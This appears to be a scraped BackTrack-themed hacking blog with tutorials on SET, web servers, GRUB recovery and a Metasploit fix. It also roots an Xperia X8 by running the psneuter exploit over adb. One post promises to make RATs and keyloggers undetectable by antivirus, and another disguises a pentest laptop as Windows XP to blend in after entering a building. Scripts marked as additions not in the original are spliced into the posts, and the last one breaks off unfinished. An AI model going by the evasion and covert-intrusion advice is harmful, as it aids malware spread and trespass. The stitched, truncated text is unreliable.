Showing posts with label Backtrack. Show all posts

Saturday, 20 July 2013

How To Make your Viruses, Payloads, Rat, Key-logger, fully Undetectable From Anti-viruses

Hi To All The Mindbenders,

Requirements:-
1. Backtrack 5 or any Linux distro having msfencode
2. Your own virus/RAT/keylogger engine; mine is test1.exe
Follow the commands shown in the figure:-
Perform all steps with root permission.

If you have any query, write in the comments below;
we will try to figure it out.



Monday, 20 May 2013

Troubleshooting Social Engineering Toolkit With Devender Mahto

Hello To The Mindbenders,
The tutorial I am sharing is due to my own bad luck, and you will hardly find this anywhere on the web.
Today I was very tense, so I couldn't handle any more errors regarding my main OS. I was in great trouble when I found that my SET toolkit showed an error like "metasploit not found". I tried to resolve this by removing all contents of the SET directory, but by my bad luck I accidentally used rm -rf * in a new terminal of Backtrack; that affected my home folder and I lost almost 5 GB of valuable data.

Then I used TestDisk but still could not recover my data. After that I decided to reinstall my SET toolkit.


Steps:-
Step 1.

Install Synaptic package manager (skip this step if you have already installed it)
  • apt-get install synaptic


Step 2.
Remove SET toolkit from Synaptic package manager
  • Open Synaptic package manager and search for set, then right-click on set and mark it for complete removal

Step 3.
Then manually remove all
dependencies of Social Engineering Toolkit.

So I again cd to the set directory, which is shown in the figure.



Step 4. After removing all dependencies of SET I planned to reinstall the latest version of Social Engineering Toolkit. Open a terminal and type
sudo bash
and then type exactly the same commands as I did in the figures.




Step 5.

Now run the SET toolkit using the commands shown in the figures.


Step 6.
Accept the EULA (End User Licence Agreement).




Step 7.
Then you can see this screen, which proves that SET is installed correctly.
 


Step 8.
Then open a new terminal and do what I did. This will install SET toolkit universally, meaning that no matter where you are, you just type se-toolkit and you will get into Social Engineering Toolkit.



Step 9.
Starting the se-toolkit: refer to the image below.

Step 10.
Then from the SET menu choose the 6th option to update the SET configuration.

Now you will no longer face errors like "Metasploit not found".

===(Next Is What...?)===

Monday, 13 May 2013

Installing Google Talk In backtrack Linux Distros

Welcome Back To The Mindbenders,


Aim:- To install the Google Talk (Gtalk) application in Linux

Steps:-


Step 1
Open a terminal and type the following command (text in red)

root@bt:~# apt-get install prism-google-talk

Step 2

Now go to Applications > Internet > Google Talk
Step 3

Google Down About Prism

===(Next Is What...?)===

Friday, 3 May 2013

Download Videos From Any Site In Linux or Backtrack


Hi To All The Mindbenders,
Today I am going to show off a simple tool for downloading videos from the web, and the tool is compatible with any Linux distro.

Steps to follow:
Step 1
Add the ClipGrab repository (text in red)
root@bt:~# sudo add-apt-repository ppa:clipgrab-team/ppa
Step 2
Update the package lists from the added repository
root@bt:~# sudo apt-get update
Step 3
Install ClipGrab
root@bt:~# sudo apt-get install clipgrab

Now enjoy ClipGrab: just put in the URL of the video you want to download.

Friday, 19 April 2013

Building Webservers In Backtrack | The Mindbenders

Hi To All The Mindbenders,

Aim:- To Build A Server in Backtrack

Open up your terminal and use the commands below (text in red)


root@bt:~# mkdir /var/www/themindbenders.tk

root@bt:~# chmod -R 775 /var/www/themindbenders.tk

root@bt:~# chown -R www-data:www-data /var/www/themindbenders.tk/

root@bt:~# service apache2 start2
 * Usage: /etc/init.d/apache2 {start|stop|restart|reload|force-reload|start-htcacheclean|stop-htcacheclean|status}

root@bt:~# service apache2 start2 start
 * Usage: /etc/init.d/apache2 {start|stop|restart|reload|force-reload|start-htcacheclean|stop-htcacheclean|status}

root@bt:~# service apache2 start
 * Starting web server apache2                                           [ OK ] 
root@bt:~# cowsay "now put some files in your website"
 ____________________________________
< now put some files in your website >
 ------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

root@bt:~# cp '/var/www/index.php' /var/www/themindbenders.tk/

root@bt:~# cp '/var/www/image.png' /var/www/themindbenders.tk/ 

root@bt:~# ifconfig

Now that you know your IP address, give it to your friends on the network,
e.g. http://192.168.1.3/themindbenders.tk
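The commands above make the whole document root group-writable and owned by www-data, so the account Apache runs as can modify every file it serves. The audit script below is an added example, not part of the original post: audit_docroot, path_writable_by and user_in_group are names chosen here, and the script assumes GNU or BusyBox stat and id.

```shell
#!/bin/sh
# Added example (not from the original post): list every path under a
# document root that a given service account could modify. The post's
# 'chmod -R 775' plus 'chown -R www-data:www-data' makes the whole tree
# writable by www-data; a clean docroot is root-owned with 755/644 modes and,
# at most, one dedicated upload directory writable by the service account.
# Only mode bits are evaluated: root bypasses them, and ACLs are not read.

# user_in_group USER GROUP -> 0 if USER belongs to GROUP (primary or supplementary)
user_in_group() {
    for grp in $(id -Gn "$1" 2>/dev/null); do
        [ "$grp" = "$2" ] && return 0
    done
    return 1
}

# path_writable_by PATH USER -> 0 if the mode bits let USER write PATH, 1 if not,
# 2 if PATH cannot be stat'ed. Uses the symbolic mode string (e.g. drwxrwxr-x):
# column 3 is the owner's write bit, column 6 the group's, column 9 everyone else's.
path_writable_by() {
    path=$1; user=$2
    perms=$(stat -c '%A' "$path" 2>/dev/null) || return 2
    owner=$(stat -c '%U' "$path")
    group=$(stat -c '%G' "$path")
    if [ "$owner" = "$user" ]; then
        col=3
    elif user_in_group "$user" "$group"; then
        col=6
    else
        col=9
    fi
    [ "$(printf '%s' "$perms" | cut -c"$col")" = w ]
}

# audit_docroot DIR USER -> prints each writable path with its mode and owner;
# returns 0 when nothing under DIR is writable by USER, 1 otherwise.
audit_docroot() {
    dir=$1; user=$2; count=0
    # here-document instead of a pipe so 'count' survives the loop
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        if path_writable_by "$p" "$user"; then
            printf '%s %s\n' "$(stat -c '%A %U:%G' "$p")" "$p"
            count=$((count + 1))
        fi
    done <<EOF
$(find "$dir" -print)
EOF
    [ "$count" -eq 0 ]
}

# Run as a script: sh audit-docroot.sh /var/www/themindbenders.tk www-data
if [ $# -eq 2 ]; then
    audit_docroot "$1" "$2"
fi
```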

===(Next Is What...?)===

Tuesday, 5 March 2013

Rooting Sony ericsson Xperia X8 E15i From Backtrack 5 | Android



Hi To All The Mindbenders,


Story:-
15 days ago, my friend Shiva {vicky} suffered from a problem, and the
problem against him was that applications he newly installed from the web needed root access and warned him about it.
And he was unable to run some cool and best apps on his Xperia X8 E15i.
Shiva told all his problems to me and I said, you have to pay for it :P
He ignored it at the moment by answering that in the market it will cost me less than you.
Then I replied: it's all up to you bro.
After 8 days he requested me to root it, and now here I am.

Now what is root?
Root is the administrator {superuser} and has all system access: root can read/write system files.
Root access means you can change the permissions as you like; for example, if you want to use a live wallpaper on your Android but your vendor blocked this service, you can run those kinds of apps by rooting your Android.

Requirements:-
1. Sony Ericsson Xperia X8 E15i
2. Backtrack 5 R3, because in this OS the Android SDK comes pre-installed
3. SuperOneClick for rooting through its exploits
4. A data cable {USB connector} for your Sony Ericsson Xperia X8 E15i.

Steps:-

Step 1.
Turn USB debugging on by going through the path below:
Settings --> Applications --> Development --> USB Debugging

Check the box of the USB Debugging option to enable it.


Step 2.
Connect your phone using the data cable {USB connector}.

Step 3.
After attaching the data cable your Xperia X8 device will pop up a menu with two options:
1. Connect Phone
2. Charge Phone

Step 4.
Click on Charge Phone.

Step 5.
Look at your Xperia X8 notification panel: there is a notification {USB Connection}. Click on it; it will ask you to mount or unmount the SD card. Simply click on Mount.
Note:- There is another notification about USB debugging, but don't touch it.

Step 6.
Then download SuperOneClick and paste it into the root {home} folder of your Backtrack 5 R3.
Note:- Before going to further steps, ensure that you are logged in as root in Backtrack 5.

Step 7.
Now unzip the downloaded SuperOneClick archive: open your terminal in Backtrack 5 R3 and paste the following text in red to unzip.

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~# unzip SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip
--------------------------------------------------------------------------------------------------------------------------------- 
In action (you can skip this):
--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~# unzip SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip
Archive:  SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip
Visit   http://www.mindbendersorg.blogspot.com
Like    https://www.facebook.com/themindbenders
Add    https://www.facebook.com/devendermahto

SuperOneClick Is Made For Rooting Xperia X8 E15i And Some Samsung Sets Having Android 2.1

   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/adblinux  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/AdbWinUsbApi.dll  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/automate.sh  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/su-v3  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/su-v2  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/su-v1  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/superuser.apk  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/psneuter  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/adb.exe  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/adbmac  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/AdbWinApi.dll  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Exploits/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Exploits/psneuter  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Exploits/GingerBreak  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/.zip  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/automate.sh  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/su-v3  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/Superuser.apk  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/su-v2  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/su-v1  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/SuperOneClick.exe  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x86/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x86/Samsung/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x86/Motorola/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x64/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x64/Samsung/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x64/Motorola/
 extracting: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/vendors.txt  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Dependencies/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Dependencies/sqlite3  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Dependencies/busybox  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Exploits/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Exploits/psneuter  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Exploits/GingerBreak  
--------------------------------------------------------------------------------------------------------------------------------- 

Note:- I assumed that my file SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip is in the home (root) folder.

Step 5.
Change the current working directory using the cd command, text in red below.

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~# cd SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]# 
--------------------------------------------------------------------------------------------------------------------------------- 

Step 6.
Now again change the working directory to your ADB folder.

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]# cd ADB
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# 
--------------------------------------------------------------------------------------------------------------------------------- 

Step 7.
Now change the permissions of your adblinux tool in the ADB folder; run the command below in the same terminal.

---------------------------------------------------------------------------------------------------------------------------------
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# chmod 775 adblinux
---------------------------------------------------------------------------------------------------------------------------------

Step 8.
Start adblinux for test purposes only; you can skip this step.

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux
Android Debug Bridge version 1.0.26

 -d                            - directs command to the only connected USB device
                                 returns an error if more than one USB device is present.
 -e                            - directs command to the only running emulator.
                                 returns an error if more than one emulator is running.
 -s <serial number>            - directs command to the USB device or emulator with
                                 the given serial number. Overrides ANDROID_SERIAL
                                 environment variable.
 -p <product name or path>     - simple product name like 'sooner', or
                                 a relative/absolute path to a product
                                 out directory like 'out/target/product/sooner'.
                                 If -p is not specified, the ANDROID_PRODUCT_OUT
                                 environment variable is used, which must
                                 be an absolute path.
 devices                       - list all connected devices
 connect <host>[:<port>]       - connect to a device via TCP/IP
                                 Port 5555 is used by default if no port number is specified.
 disconnect [<host>[:<port>]]  - disconnect from a TCP/IP device.
                                 Port 5555 is used by default if no port number is specified.
                                 Using this ocmmand with no additional arguments
                                 will disconnect from all connected TCP/IP devices.

device commands:
  adb push <local> <remote>    - copy file/dir to device
  adb pull <remote> [<local>]  - copy file/dir from device
  adb sync [ <directory> ]     - copy host->device only if changed
                                 (-l means list but don't copy)
                                 (see 'adb help all')
  adb shell                    - run remote shell interactively
  adb shell <command>          - run remote shell command
  adb emu <command>            - run emulator console command
  adb logcat [ <filter-spec> ] - View device log
  adb forward <local> <remote> - forward socket connections
                                 forward specs are one of: 
                                   tcp:<port>
                                   localabstract:<unix domain socket name>
                                   localreserved:<unix domain socket name>
                                   localfilesystem:<unix domain socket name>
                                   dev:<character device name>
                                   jdwp:<process pid> (remote only)
  adb jdwp                     - list PIDs of processes hosting a JDWP transport
  adb install [-l] [-r] [-s] <file> - push this package file to the device and install it
                                 ('-l' means forward-lock the app)
                                 ('-r' means reinstall the app, keeping its data)
                                 ('-s' means install on SD card instead of internal storage)
  adb uninstall [-k] <package> - remove this app package from the device
                                 ('-k' means keep the data and cache directories)
  adb bugreport                - return all information from the device
                                 that should be included in a bug report.

  adb help                     - show this help message
  adb version                  - show version num

DATAOPTS:
 (no option)                   - don't touch the data partition
  -w                           - wipe the data partition
  -d                           - flash the data partition

scripting:
  adb wait-for-device          - block until device is online
  adb start-server             - ensure that there is a server running
  adb kill-server              - kill the server if it is running
  adb get-state                - prints: offline | bootloader | device
  adb get-serialno             - prints: <serial-number>
  adb status-window            - continuously print device status for a specified device
  adb remount                  - remounts the /system partition on the device read-write
  adb reboot [bootloader|recovery] - reboots the device, optionally into the bootloader or recovery program
  adb reboot-bootloader        - reboots the device into the bootloader
  adb root                     - restarts the adbd daemon with root permissions
  adb usb                      - restarts the adbd daemon listening on USB
  adb tcpip <port>             - restarts the adbd daemon listening on TCP on the specified port
networking:
  adb ppp <tty> [parameters]   - Run PPP over USB.
 Note: you should not automatically start a PPP connection.
 <tty> refers to the tty for PPP stream. Eg. dev:/dev/omap_csmi_tty1
 [parameters] - Eg. defaultroute debug dump local notty usepeerdns

adb sync notes: adb sync [ <directory> ]
  <localdir> can be interpreted in several ways:

  - If <directory> is not specified, both /system and /data partitions will be updated.

  - If it is "system" or "data", only the corresponding partition
    is updated.

environmental variables:
  ADB_TRACE                    - Print debug information. A comma separated list of the following values
                                 1 or all, adb, sockets, packets, rwx, usb, sync, sysdeps, transport, jdwp
  ANDROID_SERIAL               - The serial number to connect to. -s takes priority over this if given.
  ANDROID_LOG_TAGS             - When used with the logcat option, only these debug tags are printed.

--------------------------------------------------------------------------------------------------------------------------------- 

Step 9.
Run the commands serially (text in red).

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux push Exploits/psneuter /data/local/tmp/psneuter
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
671 KB/s (585731 bytes in 0.851s)
--------------------------------------------------------------------------------------------------------------------------------- 

Note:- Your device must be connected at this moment, with your memory card mounted.

Step 10.
Copy su-v2 {exploit} into your Android with the command below (text in red).

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux push Root/su-v2 /data/local/tmp/su 
614 KB/s (26264 bytes in 0.041s)
--------------------------------------------------------------------------------------------------------------------------------- 

Step 11.
--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux push Root/superuser.apk /data/local/tmp/superuser.apk
2308 KB/s (196521 bytes in 0.083s)
--------------------------------------------------------------------------------------------------------------------------------- 

Step 12.
Run these commands serially; only the text in red are commands.
Each command is typed after the $ prompt (and commands are text in red).
--------------------------------------------------------------------------------
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux shell
$ cd /data/local/tmp
$ chmod 755 psneuter
$ ./psneuter
--------------------------------------------------------------------------------

Step 13.
Your device will disconnect by itself, or disconnect it manually, after running ./psneuter.

Step 14.
Connect it again, choose Charge Phone from the popup menu containing two options, and mount.

Step 15.
Run all commands exactly in the manner below to avoid bricking.
Each command is typed after the # prompt (and commands are text in red).

---------------------------------------------------------------------------------------------------------------------------------
root@bt:~/SuperOneClickv1.9.1-ShortFuse[1]/ADB# ./adblinux shell

# cd /data/local/tmp
# mount -o remount,rw -t yaffs2 /dev/block/mtdblock0 /system
# cat su > /system/bin/su
# cat superuser.apk > /system/app/superuser.apk
# chmod 06777 /system/bin/su
# chmod 777 /system/app/superuser.apk
# reboot
--------------------------------------------------------------------------------------------------------------------------------- 

Step 16.
Your phone will restart; just wait until it boots up.
Then go to the home screen, where you will find the Superuser app. That's it, all done.
Try to run apps like BusyBox and others in root mode by granting permissions from Superuser.


Feel free to ask any query about this post...



-:Warning:-
Do not install applications like Clean Master or any system cache remover; if you do, your phone will brick.
===(Next Is What?...)===

Tuesday, 4 December 2012

Recovering The GRUB 2 Boot Loader To Protect Your Previously Installed Operating Systems

Hi To All The Mindbenders,
As in my earlier tutorials, I'm not going to consume your important time. I am always here to provide all The Mindbenders readers quick and easy solutions.
I already posted a tutorial about recovering GRUB 2, but that was too advanced for learning to recover GRUB 2.
GRUB is similar to the boot manager (Bootmgr) of Windows.

But I'm a Linux lover and proudly help anyone who wants to stay with Linux distros.

Now we are looking forward to this post.

Note:-
1. Only commands (text) in red must be typed in your terminal.
2. Text in green after the ===> sign indicates the use of the command you are running at that instant.
3. sda5 is my partition having the Linux OS, so don't behave like monkeys: use Step 1 to identify your Linux partition. Generally it is in the ext4 or ext3 format or something like these, and for your convenience the command will show "Linux" in front of your partition.
4. Refer to my video for better results.

Steps To Follow:-

Step 0.
Boot from a live Linux or Backtrack 5 flash drive or any bootable media of your choice; it could be your DVD.

Step 1.
Figure out where you need to install GRUB 2, meaning we need to identify our partition having Linux.

root@bt:~# sudo fdisk -l        =================> List all partitions
root@bt:~# ls                   =================> List all the files/folders of your current mounted partition, having root privileges

Step 2.
Mount the partition where you need to install GRUB 2

root@bt:~# sudo mount /dev/sda5 /mnt          ========> here sda5 is the partition where Linux is, and we mounted it in the mnt folder

root@bt:~# mount                          ================> List all the mounted partitions

Step 3.
Mount the Partition to an alternate location

root@bt:~# sudo mount /dev/sda5 /mnt/boot

Step 4.
Bind-mount the /dev folder of the live image you booted from onto the /dev folder of the partition you mounted at /mnt

root@bt:~# sudo mount --bind /dev /mnt/dev/

Step 5.
chroot from the live image's root to the mounted partition's root.
chroot temporarily changes the root of the filesystem directory.

root@bt:~# pwd                             ================> Print working directory, to check the current root
root@bt:~# sudo chroot /mnt

root@bt:~# sudo mount               ================> List all the mounted partitions

root@bt:~# pwd

root@bt:~# ls                       =================> List all the files/folders of your current mounted partition, having root privileges

If you found your Linux hard drive content then you are almost on track.

Step 6.
Now reinstall the GRUB 2 loader to the drive on which the partition you mounted previously exists.

root@bt:~# sudo grub-install /dev/sda      ==========> Install GRUB in your hard drive, which is sda, your primary hard drive.

root@bt:~# pwd

Now exit your chroot shell

root@bt:~# exit

Step 7.

Cleanly unmount all the partitions you previously mounted

root@bt:~# sudo umount /mnt/dev
root@bt:~# sudo umount /mnt/boot
root@bt:~# sudo umount /mnt


now reboot...

root@bt:~# sudo reboot

Pull out your live flash disk.

When Linux or Backtrack asks you to log in, simply log in, and in the case of Backtrack do not type startx yet: use the commands below before typing startx.
For other Linux distros, log in to the system, open a terminal and then use the commands.

root@bt:~# os-prober

root@bt:~# update-grub

root@bt:~# startx                =================> Only for Backtrack Linux

Story Behind The Tutorial:-
I know how much it hurts when you want to upgrade but instead you get problems like your previously installed Linux or any other OS missing from your boot menu. I got the same situation when I upgraded from Windows 7 to Windows 8 RTM. I was shocked when I rebooted my laptop and didn't find my previously installed Backtrack 5 GRUB menu; I can't tell you how sad I was at that time. Then I asked everyone, but I had a huge list of "no", hahah. Finally I referred to some Linux forums and found the fix... Then I recorded a video of fixing the same in Ubuntu...


Tuesday, 27 November 2012

Making BackTrack5 look like XP | Social Engineering

Hello to All The Mindbenders,
Okay, so the first thing you're wondering is:
why the hell would you want to do this?

Well, the answer becomes more obvious when the scenario is set:
You're on a social engineering job and you've managed to gain access to the target building. You walk around for a bit to see if any of the desks look free. After a while you decide to sit down at what seems like an unoccupied desk. You calmly pull out your laptop and turn it on. As the laptop is booting you start looking for an Ethernet cable to plug into your laptop; you find one and plug it in. Social engineering phase complete, pentest about to start. The hard work is over and the fun is about to begin.... until someone walks past your laptop and sees your bright red coloured BackTrack wallpaper.
This one is a nice trick; just keep it low, you know what I mean.
You don't want to have that big red dragon logo on your screen; let them think it was a noob OS lol :P

 
 
You're no longer being stealthy; the wallpaper looks aggressive and the nature of your visit is becoming a concern to the other workers, who realise they've never seen you before. Next thing you know you've been collared by security, and before you know it you've been kicked out of the building, all because of the wallpaper on your laptop!
This script originally came from here, but I have neatened it up and got it working with BackTrack. So the idea of this script is to make it quick to turn your BackTrack 5 GNOME build into something that resembles Windows XP, to help you blend in with the crowd.
The package can be downloaded from here (please don't hotlink, as I might move the file to a different server to cope with all the downloads....):

 


 

Sunday, 25 November 2012

Customizing Backtrack 5 by Devender Mahto


Like
https://www.facebook.com/themindbenders

Ask
https://www.facebook.com/devendermahto

Thursday, 22 November 2012

How to Install BackTrack 5 Proper Tutorial



For security researchers who want to do penetration testing or something extra in the security field, Backtrack 5 is a good choice...

First you need to download Backtrack 5 from this link:

http://www.backtrack-linux.org/downloads/

and also download UNetbootin, which is required for creating a live USB of Backtrack:

http://unetbootin.sourceforge.net/

Requirements:
1. USB (flash drive) (minimum USB drive capacity 4 GB)
2. Backtrack 5 ISO file, md5sum verified (available at the link above)
3. UNetbootin

Procedure to burn your USB:
> Plug in your USB drive
> Format the USB drive to FAT32
> Start UNetbootin and select the "diskimage" option, then choose the BackTrack 5 ISO file you downloaded at the start of this tutorial.
> Select the amount of space to use for persistence in MB (optional)
> Select your USB drive and click "OK" to create a bootable BackTrack USB drive
> Once rebooted, remember that the default username is root and the password is toor

Your USB is ready to install BackTrack 5...

First of all, boot the Backtrack live environment.
At the bash prompt, type startx to enter the GUI.
Double-click install-Backtrack.sh, which you can see on the desktop.

Step-by-step installation process...
Select the language and click on the Forward button.
Select your geographical location and time zone, then click on the Forward button.
Choose your keyboard layout, or leave the default.
Now in the next screen choose the "Erase and use the entire disk" option if you want to format your whole hard drive and install only Backtrack in a single partition,
or choose the "manually advanced" option to select the drive you want to format and install Backtrack on,
and click Forward.
The next screen will show you the installation options; make sure everything is fine, then click on the Forward button to start the installation process.
When the installation finishes you'll need to press the Restart button, and then enjoy Backtrack 5.

NOTE : default user name is root and password is toor

Don't forget to change it...
You can also use BackTrack 5 with different operating systems like Win XP, Win 7, etc. with a dual boot setup.
K33p growing, and K33p yourself updated.

I enjoyed the whole tutorial while blogging.
Comments are welcomed...

Backtrack not Found After Installing new windows 8 ? Solved



Problem:
I had Windows 7 installed, and backtrack R2 (just upgraded to R3). I then installed Windows 8 (formatted my Main windows HDD, not my backtrack HDD). Now Windows installed his boot loader.
I Faced This Problem And Tackle My Worries Without reinstalling Any Os... I'm too Smart.
Coz I Know That If there is a problem then There is a solution for it also...
So, Is there anyway to get the GRUB loader back without reinstalling backtrack?

Solution:
Just please one thing that is not written in guides and I belive they take it for granted: If you are to recover the grub using a live CD, here is the "taken for granted" issue and looks pretty logic, but many many people do not do it: use the 64 bit distro if trying to recover a 64 bit system with grub, and use 32 bit live cd for 32-bit distro to recover...IF you do not do that, when recovering grub, you will get mounting errors ("chroot: cannot run command `/bin/bash': Exec format error").


Here is the way I do it; it is the easiest way from a live CD (remember to use the 32- or 64-bit version according to the system you want to recover):

Insert the live CD (an Ubuntu release with GRUB 2, such as Lucid 10.04) and boot Ubuntu.



Then open a terminal and run the following commands:

    sudo fdisk -l
        # find your BT partition: sda1, sda2, etc.

    sudo mount /dev/sdaX /mnt
        # mount it; X is the partition number, e.g. sda7 is my drive, so X is 7

    sudo grub-install --root-directory=/mnt/ /dev/sda
        # install GRUB to the disk (/dev/sda, or wherever your HDD is mapped),
        # NOT to the partition /dev/sdaX

Reboot (sudo shutdown -r now). If any OS is missing from the GRUB menu, boot into BT and run

    os-prober

to list the other installed systems, then regenerate the menu:

    update-grub

Now You Are Free To Use Your Dual Boot System... Ready... :D
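The 32-bit/64-bit caveat above is the step people skip, so here is the same recovery procedure wrapped in a script that checks the word size of the installed system against the live CD before touching GRUB. This is an added example, not part of the original post: the mount point /mnt, the check against the installed /bin/bash, and the partition/disk arguments are assumptions. It reads the ELF class byte of the installed bash (offset 4: 1 means 32-bit, 2 means 64-bit) and compares it with uname -m of the live system.

```shell
#!/bin/sh
# Added example, not from the original post: confirm the live CD and the installed
# BackTrack root have the same word size before chroot / grub-install, so you never
# hit "chroot: cannot run command `/bin/bash': Exec format error".
# The mount point /mnt and the partition/disk names are assumptions.

# elf_bits FILE: print 32 or 64 from the ELF class byte (offset 4: 1 = ELFCLASS32, 2 = ELFCLASS64)
elf_bits() {
    _cls=$(od -An -tu1 -j4 -N1 "$1" 2>/dev/null | tr -d ' ')
    case "$_cls" in
        1) echo 32 ;;
        2) echo 64 ;;
        *) echo unknown ;;
    esac
}

# live_bits: word size of the live CD we are currently running from
live_bits() {
    case "$(uname -m)" in
        x86_64|amd64|aarch64) echo 64 ;;
        i?86|armv7l|armv6l)   echo 32 ;;
        *)                    echo unknown ;;
    esac
}

# check_arch_match ROOT: return 0 only if ROOT/bin/bash matches the live system's word size
check_arch_match() {
    _root=${1:-/mnt}
    _target=$(elf_bits "$_root/bin/bash")
    _live=$(live_bits)
    if [ "$_target" = unknown ]; then
        echo "could not read $_root/bin/bash; is the root partition mounted at $_root?" >&2
        return 1
    fi
    if [ "$_target" = "$_live" ]; then
        echo "OK: live $_live-bit, installed system $_target-bit"
        return 0
    fi
    echo "MISMATCH: live $_live-bit, installed system $_target-bit; boot a $_target-bit live CD" >&2
    return 1
}

# recover_grub PARTITION DISK: the post's procedure with the check in front,
# e.g. recover_grub /dev/sda7 /dev/sda  (GRUB goes to the disk, not the partition)
recover_grub() {
    _part=$1
    _disk=$2
    sudo mount "$_part" /mnt || return 1
    if ! check_arch_match /mnt; then
        sudo umount /mnt
        return 1
    fi
    sudo grub-install --root-directory=/mnt/ "$_disk"
}

# Only act when invoked with PARTITION and DISK; the functions can be sourced on their own.
if [ $# -eq 2 ]; then
    recover_grub "$1" "$2"
fi
```

After a successful recover_grub, reboot into BT and run os-prober and update-grub exactly as in the post; the script deliberately stops at grub-install because the menu regeneration has to happen from the installed system.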

Be Brave, K33p Yourself Updated...

Suggestions and Questions are welcomed...

Thursday, 15 November 2012

Msfupdate not working with "no version information available" error by Shubham Mittal (@k@ Upgoingstaar)


A few days back, while working on my testing and research, I came across an error that kept stopping me from updating my Metasploit Framework. The error message was something like this:

[Screenshot: msfupdate failing with "no version information available"]

No version available and blah blah blah. I ignored it for a couple of days because of workload and downloaded exploits manually. But when that started to feel childish, I got down to the roots. The "no version information available" error means that the dynamic loader found a libssl.so.0.9.8 that carries no symbol-version information for the versioned symbols the Metasploit binary was linked against, so it cannot confirm it is the right library, and the update tooling falls over. Quite childish, but real. So I checked its libraries:

[Screenshot: library listing showing the libssl.so.0.9.8 that msf loads]

The libssl.so.0.9.8 that msf loads is not a link to the one in /usr/lib/, although the rest of the system relies on that one. So what we need to do is:
1. back up the library that is making msf error out;
2. replace it with a link to the matching library in /usr/lib/.

Do this : 

[Screenshot: backing up the library and creating the symlink]

Once you are done with all this, go ahead and update your Metasploit. You will get a smile on your face.

[Screenshot: msfupdate running successfully]

So this is how you avoid undoing your work whenever you hit an error: dig into the cause, as in this case with msf.
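The two steps above (back up the offending library, then link it to the system copy) were shown as screenshots in the original post. As an added example that is not the post's own commands, here is the same operation as a small reversible script: it refuses to clobber an existing backup, verifies the system library actually exists first, and can undo itself. The paths in the usage comment are placeholders; the real bundled path is whatever the msfupdate error names on your box, and the ldd helper assumes you know which binary (msf's ruby) to inspect.

```shell
#!/bin/sh
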